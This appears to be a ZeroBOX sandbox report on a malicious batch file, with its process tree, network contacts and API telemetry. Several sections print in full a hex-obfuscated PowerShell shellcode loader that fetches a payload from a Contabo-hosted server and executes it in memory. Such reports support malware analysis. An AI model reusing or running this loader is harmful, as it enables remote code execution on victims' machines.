Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	May 25, 2023, 10:49 a.m.	May 25, 2023, 10:51 a.m.

Size	4.7KB
Type	ASCII text, with very long lines, with no line terminators
MD5	`5f9e0afb3503d909984b3b30d038bdc5`
SHA256	`7dd84cc7d8271a88063ce1ff1f1abe74c8e5b33301cb957b951161e6fe1b73fc`
CRC32	`ABE23913`
ssdeep	`96:r3UaZFF5khGbjiju0cCVyIQBbnuREIeNdT:rkguPjR7VyxBbnuREIaN`
Yara	None matched

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "iHjkEoTtwJ" C:\Users\test22\AppData\Local\Temp\PMTRD.bat
2564
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\PMTRD.bat
  2636
  - cmd.exe C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command "$tsA ="$FX="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C202033303732293B0D0A247878786161633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472205669727475616C416C6C6F6328496E7450747220622C75696E7420632C75696E7420642C75696E742065293B273B0D0A24787878766163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878616163202D4E616D65202241414322202D50617373546872753B0D0A2478787861626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B0D0A247878786161623D4164642D54797065202D4D656D626572446566696E6974696F6E202478787861626162202D4E616D65202241414222202D50617373546872753B0D0A247878786761633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B0D0A24787878676163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878676163202D4E616D6520224741432220202D50617373546872753B0D0A247878786D6F763D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20766F69642052746C4D6F76654D656D6F727928496E7450747220622C496E7450747220632C75696E742064293B273B0D0A247878786D6F766D3D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6F76202D4E616D6520224D4F5622202D50617373546872753B0D0A247878786D6D733D275B446C6C496D706F727428226D73766372742E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472206D656D73657428496E74507472206473742C75696E74207372632C75696E7420636F756E74293B273B0D0A247878786D6D73663D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6D73202D4E616D6520224D4D5322202D50617373546872753B0D0A2478787863203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B0D0A24787878643D22687474703A2F2F766D693831303833302E636F6E7461626F7365727665722E6E65742F6C6F63616C2F63616368652D6A732F66393337353465363630383032643763633730393234636365623437333865662E677A220D0A2478787862623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B0D0A247878786363633D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786262202D4E616D65202242424222202D50617373546872753B0D0A247878786464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B0D0A247878786666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878646464202D4E616D65202244444422202D50617373546872753B0D0A24787878653D3131323B0D0A646F207B0D0A20747279207B200D0A202024787878632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B0D0A202024787878786D7077343D24787878632E446F776E6C6F616444617461282478787864293B0D0A2020247878786C656E203D2024787878786D7077342E4C656E6774683B0D0A2020247878787830203D2024787878676163663A3A476C6F62616C416C6C6F63283078303034302C20247878786C656E2B3078313030293B0D0A2020247878786F6C64203D20303B0D0A2020247878786161623A3A5669727475616C50726F74656374282478787878302C20247878786C656E2B30783130302C20307834302C205B7265665D247878786F6C64293B0D0A2020247878786B6579203D2024787878786D7077345B305D3B0D0A2020247878786461746150203D2024787878786D7077345B315D3B0D0A2020666F7220282478787868203D20303B202478787868202D6C7420247878786C656E2D2478787864617461503B2024787878682B2B29207B2020200D0A2020205B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478787878302C2024787878682C202824787878786D7077345B24787878682B2478787864617461505D202D62786F722024787878786D7077345B305D2920293B0D0A20207D3B0D0A2020747279207B0D0A2020207468726F7720313B0D0A20207D6361746368207B0D0A2020202478787868616E646C653D247878786363633A3A43726561746554687265616428302C302C2478787878302C302C302C30293B0D0A202020247878786666663A3A57616974466F7253696E676C654F626A656374282478787868616E646C652C202D31293B0D0A20207D3B0D0A202024787878653D3232323B0D0A207D63617463687B0D0A2020736C6565702031353B0D0A202024787878653D3131323B0D0A207D0D0A7D207768696C65282478787865202D657120313132293B""";$Nrd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));"
    2724
    - powershell.exe powershell -windowstyle hidden -command "$tsA ="$FX="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C202033303732293B0D0A247878786161633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472205669727475616C416C6C6F6328496E7450747220622C75696E7420632C75696E7420642C75696E742065293B273B0D0A24787878766163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878616163202D4E616D65202241414322202D50617373546872753B0D0A2478787861626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B0D0A247878786161623D4164642D54797065202D4D656D626572446566696E6974696F6E202478787861626162202D4E616D65202241414222202D50617373546872753B0D0A247878786761633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B0D0A24787878676163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878676163202D4E616D6520224741432220202D50617373546872753B0D0A247878786D6F763D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20766F69642052746C4D6F76654D656D6F727928496E7450747220622C496E7450747220632C75696E742064293B273B0D0A247878786D6F766D3D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6F76202D4E616D6520224D4F5622202D50617373546872753B0D0A247878786D6D733D275B446C6C496D706F727428226D73766372742E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472206D656D73657428496E74507472206473742C75696E74207372632C75696E7420636F756E74293B273B0D0A247878786D6D73663D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6D73202D4E616D6520224D4D5322202D50617373546872753B0D0A2478787863203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B0D0A24787878643D22687474703A2F2F766D693831303833302E636F6E7461626F7365727665722E6E65742F6C6F63616C2F63616368652D6A732F66393337353465363630383032643763633730393234636365623437333865662E677A220D0A2478787862623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B0D0A247878786363633D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786262202D4E616D65202242424222202D50617373546872753B0D0A247878786464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B0D0A247878786666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878646464202D4E616D65202244444422202D50617373546872753B0D0A24787878653D3131323B0D0A646F207B0D0A20747279207B200D0A202024787878632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B0D0A202024787878786D7077343D24787878632E446F776E6C6F616444617461282478787864293B0D0A2020247878786C656E203D2024787878786D7077342E4C656E6774683B0D0A2020247878787830203D2024787878676163663A3A476C6F62616C416C6C6F63283078303034302C20247878786C656E2B3078313030293B0D0A2020247878786F6C64203D20303B0D0A2020247878786161623A3A5669727475616C50726F74656374282478787878302C20247878786C656E2B30783130302C20307834302C205B7265665D247878786F6C64293B0D0A2020247878786B6579203D2024787878786D7077345B305D3B0D0A2020247878786461746150203D2024787878786D7077345B315D3B0D0A2020666F7220282478787868203D20303B202478787868202D6C7420247878786C656E2D2478787864617461503B2024787878682B2B29207B2020200D0A2020205B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478787878302C2024787878682C202824787878786D7077345B24787878682B2478787864617461505D202D62786F722024787878786D7077345B305D2920293B0D0A20207D3B0D0A2020747279207B0D0A2020207468726F7720313B0D0A20207D6361746368207B0D0A2020202478787868616E646C653D247878786363633A3A43726561746554687265616428302C302C2478787878302C302C302C30293B0D0A202020247878786666663A3A57616974466F7253696E676C654F626A656374282478787868616E646C652C202D31293B0D0A20207D3B0D0A202024787878653D3232323B0D0A207D63617463687B0D0A2020736C6565702031353B0D0A202024787878653D3131323B0D0A207D0D0A7D207768696C65282478787865202D657120313132293B""";$Nrd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));"
      2808
      - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\zucfn5_i.cmdline"
        2912
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESF647.tmp" "c:\Users\test22\AppData\Local\Temp\CSCF637.tmp"
        2968
      - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\l9fffhn5.cmdline"
        3012
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESF7FD.tmp" "c:\Users\test22\AppData\Local\Temp\CSCF7FC.tmp"
        3056
      - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\8dsuuhnt.cmdline"
        1152
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESF9C2.tmp" "c:\Users\test22\AppData\Local\Temp\CSCF9B1.tmp"
        800
      - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\x_sns7up.cmdline"
        1356
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESFB68.tmp" "c:\Users\test22\AppData\Local\Temp\CSCFB57.tmp"
        320
      - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\hhisrn0v.cmdline"
        2260
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESFD0E.tmp" "c:\Users\test22\AppData\Local\Temp\CSCFD0D.tmp"
        2372
      - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\ztglqo2w.cmdline"
        2516
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RESFEC3.tmp" "c:\Users\test22\AppData\Local\Temp\CSCFEB3.tmp"
        2544
      - csc.exe "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\rktisogl.cmdline"
        2648
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES98.tmp" "c:\Users\test22\AppData\Local\Temp\CSC87.tmp"
        2756

Name	Response	Post-Analysis Lookup
vmi810830.contaboserver.net	A 75.119.136.207	75.119.136.207

IP Address	Status	Action
164.124.101.2	Active	Moloch
75.119.136.207	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW May 25, 2023, 10:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 10:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 10:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 10:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA May 25, 2023, 10:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 10:49 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW May 25, 2023, 10:49 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent May 25, 2023, 10:49 a.m.			0	0

Command line console output was observed (11 events)

Time & API	Arguments	Status	Return
WriteConsoleW May 25, 2023, 10:49 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW May 25, 2023, 10:49 a.m.	buffer: start console_handle: 0x00000007	1	1
WriteConsoleW May 25, 2023, 10:49 a.m.	buffer: /min C:\Windows\SysWOW64\cmd.exe /c powershell -windowstyle hidden -command "$tsA ="$FX="""5B4E65742E53657276696365506F696E744D616E616765725D3A3A536563757269747950726F746F636F6C3D5B456E756D5D3A3A546F4F626A656374285B4E65742E536563757269747950726F746F636F6C547970655D2C202033303732293B0D0A247878786161633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472205669727475616C416C6C6F6328496E7450747220622C75696E7420632C75696E7420642C75696E742065293B273B0D0A24787878766163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878616163202D4E616D65202241414322202D50617373546872753B0D0A2478787861626162203D20275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20626F6F6C205669727475616C50726F7465637428496E7450747220612C75696E7420622C75696E7420632C6F757420496E745074722064293B273B0D0A247878786161623D4164642D54797065202D4D656D626572446566696E6974696F6E202478787861626162202D4E616D65202241414222202D50617373546872753B0D0A247878786761633D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E7450747220476C6F62616C416C6C6F632875696E7420622C75696E742063293B273B0D0A24787878676163663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878676163202D4E616D6520224741432220202D50617373546872753B0D0A247878786D6F763D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20766F69642052746C4D6F76654D656D6F727928496E7450747220622C496E7450747220632C75696E742064293B273B0D0A247878786D6F766D3D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6F76202D4E616D6520224D4F5622202D50617373546872753B0D0A247878786D6D733D275B446C6C496D706F727428226D73766372742E646C6C22295D7075626C6963207374617469632065787465726E20496E74507472206D656D73657428496E74507472206473742C75696E74207372632C75696E7420636F756E74293B273B0D0A247878786D6D73663D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786D6D73202D4E616D6520224D4D5322202D50617373546872753B0D0A2478787863203D204E65772D4F626A6563742053797374656D2E4E65742E576562436C69656E743B0D0A24787878643D22687474703A2F2F766D693831303833302E636F6E7461626F7365727665722E6E65742F6C6F63616C2F63616368652D6A732F66393337353465363630383032643763633730393234636365623437333865662E677A220D0A2478787862623D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722043726561746554687265616428496E7450747220612C75696E7420622C496E7450747220632C496E7450747220642C75696E7420652C496E745074722066293B273B0D0A247878786363633D4164642D54797065202D4D656D626572446566696E6974696F6E20247878786262202D4E616D65202242424222202D50617373546872753B0D0A247878786464643D275B446C6C496D706F727428226B65726E656C33322E646C6C22295D7075626C6963207374617469632065787465726E20496E745074722057616974466F7253696E676C654F626A65637428496E7450747220612C75696E742062293B273B0D0A247878786666663D4164642D54797065202D4D656D626572446566696E6974696F6E2024787878646464202D4E616D65202244444422202D50617373546872753B0D0A24787878653D3131323B0D0A646F207B0D0A20747279207B200D0A202024787878632E486561646572735B22757365722D6167656E74225D203D2022636F6E6E6E656374696E672E2E2E223B0D0A202024787878786D7077343D24787878632E446F776E6C6F616444617461282478787864293B0D0A2020247878786C656E203D2024787878786D7077342E4C656E6774683B0D0A2020247878787830203D2024787878676163663A3A476C6F62616C416C6C6F63283078303034302C20247878786C656E2B3078313030293B0D0A2020247878786F6C64203D20303B0D0A2020247878786161623A3A5669727475616C50726F74656374282478787878302C20247878786C656E2B30783130302C20307834302C205B7265665D247878786F6C64293B0D0A2020247878786B6579203D2024787878786D7077345B305D3B0D0A2020247878786461746150203D2024787878786D7077345B315D3B0D0A2020666F7220282478787868203D20303B202478787868202D6C7420247878786C656E2D2478787864617461503B2024787878682B2B29207B2020200D0A2020205B53797374656D2E52756E74696D652E496E7465726F7053657276696365732E4D61727368616C5D3A3A577269746542797465282478787878302C2024787878682C202824787878786D7077345B24787878682B2478787864617461505D202D62786F722024787878786D7077345B305D2920293B0D0A20207D3B0D0A2020747279207B0D0A2020207468726F7720313B0D0A20207D6361746368207B0D0A2020202478787868616E646C653D247878786363633A3A43726561746554687265616428302C302C2478787878302C302C302C30293B0D0A202020247878786666663A3A57616974466F7253696E676C654F626A656374282478787868616E646C652C202D31293B0D0A20207D3B0D0A202024787878653D3232323B0D0A207D63617463687B0D0A2020736C6565702031353B0D0A202024787878653D3131323B0D0A207D0D0A7D207768696C65282478787865202D657120313132293B""";$Nrd="""""";for($O6c6=0;$O6c6 -le $FX.Length-2;$O6c6=$O6c6+2){$Eh=$FX[$O6c6]+$FX[$O6c6+1];$Nrd= $Nrd+[char]([convert]::toint16($Eh,16));};Invoke-Command -ScriptBlock ([Scriptblock]::Create($Nrd));";Invoke-Command -ScriptBlock ([Scriptblock]::Create($tsA));" console_handle: 0x00000007	1	1
WriteConsoleW May 25, 2023, 10:49 a.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW May 25, 2023, 10:49 a.m.	buffer: Exception setting "SecurityProtocol": "The requested security protocol is not s console_handle: 0x00000023	1	1
WriteConsoleW May 25, 2023, 10:49 a.m.	buffer: upported." console_handle: 0x0000002f	1	1
WriteConsoleW May 25, 2023, 10:49 a.m.	buffer: At line:1 char:28 console_handle: 0x0000003b	1	1
WriteConsoleW May 25, 2023, 10:49 a.m.	buffer: + [Net.ServicePointManager]:: <<<< SecurityProtocol=[Enum]::ToObject([Net.Secur console_handle: 0x00000047	1	1
WriteConsoleW May 25, 2023, 10:49 a.m.	buffer: ityProtocolType], 3072); console_handle: 0x00000053	1	1
WriteConsoleW May 25, 2023, 10:49 a.m.	buffer: + CategoryInfo : InvalidOperation: (:) [], RuntimeException console_handle: 0x0000005f	1	1
WriteConsoleW May 25, 2023, 10:49 a.m.	buffer: + FullyQualifiedErrorId : PropertyAssignmentException console_handle: 0x0000006b	1	1

Uses Windows APIs to generate a cryptographic key (50 out of 354 events)

Time & API	Arguments	Status	Return
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9a98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9b98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9b98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9b98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9b98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9b98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9b98 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9f18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba018 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005b9798 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x005ba418 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ea58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x0049ea58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004acd18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey May 25, 2023, 10:49 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x004acd58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx May 25, 2023, 10:49 a.m.		1	1	0

